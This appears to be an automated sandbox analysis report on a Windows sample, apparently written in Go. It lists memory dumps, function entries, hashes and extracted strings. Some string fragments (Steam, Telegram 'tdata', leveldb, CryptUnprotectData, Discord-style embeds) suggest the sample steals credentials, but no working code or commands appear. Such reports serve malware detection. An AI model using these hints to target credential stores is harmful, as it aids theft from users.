Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f593e1400dd02c37fffaec8218d6def2ec9772c484c906eaa86c6768194b82fc
Instruction ID: a88e3e26d240774db7ff9721a561dfbad108c802e2f9740098b607600ed211fb
Opcode Fuzzy Hash: f593e1400dd02c37fffaec8218d6def2ec9772c484c906eaa86c6768194b82fc
Instruction Fuzzy Hash: E3216A36A09F8486DA19DB21F88636A77A4F74AB80F15C662EE9C43765DF39C191CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00BB89E0 Relevance: 1.5, APIs: 1, Instructions: 42encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateChain.CRYPT32 ref: 00BB8A53

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: ae9484ab8339121adab38818ee12098b0ed07cd46f7304dadeff90e65abf235e
Instruction ID: 9c15fba7d058912243cf47f8714877960caee0018b01d797f8f92f668086e986
Opcode Fuzzy Hash: ae9484ab8339121adab38818ee12098b0ed07cd46f7304dadeff90e65abf235e
Instruction Fuzzy Hash: AC012D76A11F80C2DB219B5AE8413697374E348BE4F244266DFAD57BA4CB39E1A3C740

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B67200 Relevance: 35.0, Strings: 27, Instructions: 1250COMMON

Download Yara Rule

Strings

/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: n, xrefs: 00B681BE
/cpu/classes/gc/mark/idle:cpu-secondssetprofilebucket: profile already setfailed to reserve page summary memoryruntime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function a, xrefs: 00B674EB
/cpu/classes/gc/mark/assist:cpu-seconds/cpu/classes/scavenge/total:cpu-seconds/memory/classes/profiling/buckets:bytesmspan.sweep: bad span state after sweepruntime: blocked write on free polldescsuspendG from non-preemptible goroutineruntime: casfrom_Gscanstat, xrefs: 00B6741C
/cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sync/mutex/wait/total:seconds/godebug/non-default-behavior/freedefer with d._panic != nilpanic called with nil argumentcheckdead: inconsistent countsrunqputslow: queue is not fullruntime: bad pointer, xrefs: 00B677C7
/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept runtime: netpoll failedpanic during preemptoffnanotime returning zerofatal: morestack on g0the cur, xrefs: 00B67C3E
/gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.semasleep unexpectedfatal: morestack on gsignalruntime:, xrefs: 00B67CA7
/gc/pauses:seconds because dotdotdotruntime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime., xrefs: 00B68042
/cpu/classes/scavenge/assist:cpu-secondsruntime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unknown mark worker modecannot free workbufs when work.full != 0runtime: out of memory: cannot allocate runtime.preemptM: du, xrefs: 00B6768E
/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not foundpreempt off reason: , xrefs: 00B67A9E
/cpu/classes/idle:cpu-seconds/cpu/classes/user:cpu-seconds/gc/heap/allocs-by-size:bytes/gc/stack/starting-size:bytesgc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode= scanobject of a noscan objectruntime: marking free object addspecial on invalid pointe, xrefs: 00B67627
/sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: invalid p statecheckdead: no p for timercheckdead:, xrefs: 00B686AB
/gc/cycles/total:gc-cyclesnegative idle mark workersuse of invalid sweepLockerruntime: bad span s.state=freedefer with d.fn != nilforEachP: P did not run fnwakep: negative nmspinningstartlockedm: locked to meentersyscall inconsistent inittask with no functions, xrefs: 00B67967
/memory/classes/metadata/other:bytesuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:, xrefs: 00B684AC
/gc/gogc:percent, not a functiongc: unswept span KiB work (bg), mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = already; errno=runtime stack:inva, xrefs: 00B67E70
/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowkernel32.dll not foundadvapi32.dll not foundduplicated defer entryruntime.main not on m0set_crosscall2 missingbad g->status in r, xrefs: 00B679CE
/gc/cycles/forced:gc-cycles/memory/classes/other:bytes/memory/classes/total:bytesfailed to set sweep barrierwork.nwait was > work.nproc not in stack roots range [allocated pages below zero?address not a stack addressmspan.sweep: bad span stateinvalid profile b, xrefs: 00B678FE
/memory/classes/metadata/mcache/inuse:bytesruntime.SetFinalizer: first argument is nilruntime.SetFinalizer: finalizer already setgcBgMarkWorker: unexpected gcMarkWorkerModenon in-use span found with specials bit setgrew heap, but no adequate free space foundro, xrefs: 00B6835B
/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additiona, xrefs: 00B680EC
/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytesmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old, xrefs: 00B67552
/cpu/classes/gc/mark/dedicated:cpu-seconds/memory/classes/metadata/mcache/free:bytes/memory/classes/metadata/mspan/inuse:bytesnon-empty mark queue after concurrent marksweep: tried to preserve a user arena spanruntime: blocked write on closing polldescacquireS, xrefs: 00B67484
/memory/classes/metadata/mspan/free:bytesruntime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpanLocked - invalid span stateattempted to a, xrefs: 00B683BC
/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not, xrefs: 00B67A35
/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbiddencompileCallback: float results not suppo, xrefs: 00B676F5
/gc/heap/allocs:bytesruntime: work.nwait= previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep, xrefs: 00B67BD5
:events, goid= s=nil (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type nil keyderivedInitialExpiresSubjectwsarecvwsasendlookup charsetos/execruntimeSHA-224SHA-256S, xrefs: 00B68873
/cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAddr = range partially over, xrefs: 00B673A9
/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running , xrefs: 00B68153

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAddr = range partially over$/cpu/classes/gc/mark/assist:cpu-seconds/cpu/classes/scavenge/total:cpu-seconds/memory/classes/profiling/buckets:bytesmspan.sweep: bad span state after sweepruntime: blocked write on free polldescsuspendG from non-preemptible goroutineruntime: casfrom_Gscanstat$/cpu/classes/gc/mark/dedicated:cpu-seconds/memory/classes/metadata/mcache/free:bytes/memory/classes/metadata/mspan/inuse:bytesnon-empty mark queue after concurrent marksweep: tried to preserve a user arena spanruntime: blocked write on closing polldescacquireS$/cpu/classes/gc/mark/idle:cpu-secondssetprofilebucket: profile already setfailed to reserve page summary memoryruntime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function a$/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytesmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old$/cpu/classes/idle:cpu-seconds/cpu/classes/user:cpu-seconds/gc/heap/allocs-by-size:bytes/gc/stack/starting-size:bytesgc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode= scanobject of a noscan objectruntime: marking free object addspecial on invalid pointe$/cpu/classes/scavenge/assist:cpu-secondsruntime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unknown mark worker modecannot free workbufs when work.full != 0runtime: out of memory: cannot allocate runtime.preemptM: du$/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbiddencompileCallback: float results not suppo$/cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sync/mutex/wait/total:seconds/godebug/non-default-behavior/freedefer with d._panic != nilpanic called with nil argumentcheckdead: inconsistent countsrunqputslow: queue is not fullruntime: bad pointer$/gc/cycles/forced:gc-cycles/memory/classes/other:bytes/memory/classes/total:bytesfailed to set sweep barrierwork.nwait was > work.nproc not in stack roots range [allocated pages below zero?address not a stack addressmspan.sweep: bad span stateinvalid profile b$/gc/cycles/total:gc-cyclesnegative idle mark workersuse of invalid sweepLockerruntime: bad span s.state=freedefer with d.fn != nilforEachP: P did not run fnwakep: negative nmspinningstartlockedm: locked to meentersyscall inconsistent inittask with no functions$/gc/gogc:percent, not a functiongc: unswept span KiB work (bg), mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = already; errno=runtime stack:inva$/gc/heap/allocs:bytesruntime: work.nwait= previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep$/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept runtime: netpoll failedpanic during preemptoffnanotime returning zerofatal: morestack on g0the cur$/gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.semasleep unexpectedfatal: morestack on gsignalruntime:$/gc/pauses:seconds because dotdotdotruntime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.$/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowkernel32.dll not foundadvapi32.dll not foundduplicated defer entryruntime.main not on m0set_crosscall2 missingbad g->status in r$/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep: state=sysMemStat overflowbad sequence numberntdll.dll not$/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not foundpreempt off reason: $/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additiona$/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running $/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: n$/memory/classes/metadata/mcache/inuse:bytesruntime.SetFinalizer: first argument is nilruntime.SetFinalizer: finalizer already setgcBgMarkWorker: unexpected gcMarkWorkerModenon in-use span found with specials bit setgrew heap, but no adequate free space foundro$/memory/classes/metadata/mspan/free:bytesruntime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpanLocked - invalid span stateattempted to a$/memory/classes/metadata/other:bytesuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:$/sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: invalid p statecheckdead: no p for timercheckdead:$:events, goid= s=nil (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type nil keyderivedInitialExpiresSubjectwsarecvwsasendlookup charsetos/execruntimeSHA-224SHA-256S
API String ID: 0-3983911921
Opcode ID: 0ee44418076ef5eed633ae3373e4346df773cd9282074308375538cda0ec4039
Instruction ID: 5dd07c9011578b3b581a38313e97febfd24a22da0a85d14fe56cd5f85f298de9
Opcode Fuzzy Hash: 0ee44418076ef5eed633ae3373e4346df773cd9282074308375538cda0ec4039
Instruction Fuzzy Hash: 76D23876209B80C1EB2ADF14E8913EA73E5F788784F59D866DA8947765EF7CC884C700

Uniqueness

Uniqueness Score: -1.00%

Function 00B7AFC0 Relevance: 14.3, Strings: 11, Instructions: 542COMMON

Download Yara Rule

Strings

] = (usageinit ms, fault tab= top=[...], fp:sse41sse42ssse3tls: Earlyparsehostsfilesimap2imap3imapspop3sutf-8%s*%dtext/bad nSHA-1P-224P-256P-384P-521ECDSA (at Classmatchrune inlinefieldsauthorfooterembeds`None`StringFormat[]bytestringConfigconfigemojistdummyS, xrefs: 00B7B2F8
runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflowsemacquire not on the G stackruntime: split stack overflowstring concatenation too lon, xrefs: 00B7B8A5
, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type nil keyderivedInitialExpiresSubjectwsarecvwsasendlookup charsetos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:::ffff:answersI, xrefs: 00B7B7DA
] = pc=: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp=) m=asn1ermssse3avx2bmi1bmi2Fromdial unixicmpigmpftpspop3smtpxn--bitsNameTypecap -> failcx16sse2titlecolorvalue@Lazefalse<nil>ErrorSavedSteamtdatadumpsemojiMarchAprilmonthLocal+0530+0430+0545+0630, xrefs: 00B7B736
, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime:, xrefs: 00B7B8C5
runtime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.semawakeupCryptUnp, xrefs: 00B7B36F
runtime: p.searchAddr = range partially overlapsbad defer entry in panicbypassed recovery failedstack trace unavailablebindm in unexpected GOOSrunqsteal: runq overflowdouble traceGCSweepStartzip: writer closed twiceerror decrypting messagecertificate unobtain, xrefs: 00B7B825
runtime: summary[runtime: level = , p.searchAddr = runtime.newosprocruntime/internal/thread exhaustionlocked m0 woke upentersyscallblock spinningthreads=gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff RegLo, xrefs: 00B7B2BF, 00B7B6F6
, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by Crypt32.dlli/o timeoutMoveFil, xrefs: 00B7B7BC
, i = code= addr= m->p= p->m=SCHED curg= ctxt: min= max= (...) base --%sGetACPrdtscppopcnt, val X25519%w%.0wAcceptServernetdns.localreturn.onionip+netdomaingophertelnetcmd/goLengthheaderAnswerempty rune1 STREETavx512rdrandrdseedfloat32float64leveldbAPPDA, xrefs: 00B7B845
bad summary dataruntime: addr = runtime: base = runtime: head = already; errno=runtime stack:invalid g statuscastogscanstatusbad g transitionschedule: in cgoreflect mismatch untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:leng, xrefs: 00B7B39C, 00B7BAEC

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: , i = code= addr= m->p= p->m=SCHED curg= ctxt: min= max= (...) base --%sGetACPrdtscppopcnt, val X25519%w%.0wAcceptServernetdns.localreturn.onionip+netdomaingophertelnetcmd/goLengthheaderAnswerempty rune1 STREETavx512rdrandrdseedfloat32float64leveldbAPPDA$, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type nil keyderivedInitialExpiresSubjectwsarecvwsasendlookup charsetos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:::ffff:answersI$, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime:$, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by Crypt32.dlli/o timeoutMoveFil$] = pc=: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp=) m=asn1ermssse3avx2bmi1bmi2Fromdial unixicmpigmpftpspop3smtpxn--bitsNameTypecap -> failcx16sse2titlecolorvalue@Lazefalse<nil>ErrorSavedSteamtdatadumpsemojiMarchAprilmonthLocal+0530+0430+0545+0630$] = (usageinit ms, fault tab= top=[...], fp:sse41sse42ssse3tls: Earlyparsehostsfilesimap2imap3imapspop3sutf-8%s*%dtext/bad nSHA-1P-224P-256P-384P-521ECDSA (at Classmatchrune inlinefieldsauthorfooterembeds`None`StringFormat[]bytestringConfigconfigemojistdummyS$bad summary dataruntime: addr = runtime: base = runtime: head = already; errno=runtime stack:invalid g statuscastogscanstatusbad g transitionschedule: in cgoreflect mismatch untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:leng$runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflowsemacquire not on the G stackruntime: split stack overflowstring concatenation too lon$runtime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.semawakeupCryptUnp$runtime: p.searchAddr = range partially overlapsbad defer entry in panicbypassed recovery failedstack trace unavailablebindm in unexpected GOOSrunqsteal: runq overflowdouble traceGCSweepStartzip: writer closed twiceerror decrypting messagecertificate unobtain$runtime: summary[runtime: level = , p.searchAddr = runtime.newosprocruntime/internal/thread exhaustionlocked m0 woke upentersyscallblock spinningthreads=gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff RegLo
API String ID: 0-308568899
Opcode ID: b16f33be384577812de86f46f2a755160f3dbd259cf8438c03f05a5dd40f7738
Instruction ID: 241e27e82294d83cded46cbe824f30a2e5807137d365044fcc3efe5925bd22c8
Opcode Fuzzy Hash: b16f33be384577812de86f46f2a755160f3dbd259cf8438c03f05a5dd40f7738
Instruction Fuzzy Hash: EC32C376718BC481DB20AB11F4817EEA3A5F798BC0F448562DEAE17B69DF78C845CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00B6A8A0 Relevance: 13.1, Strings: 10, Instructions: 645COMMON

Download Yara Rule

Strings

., xrefs: 00B6AE74
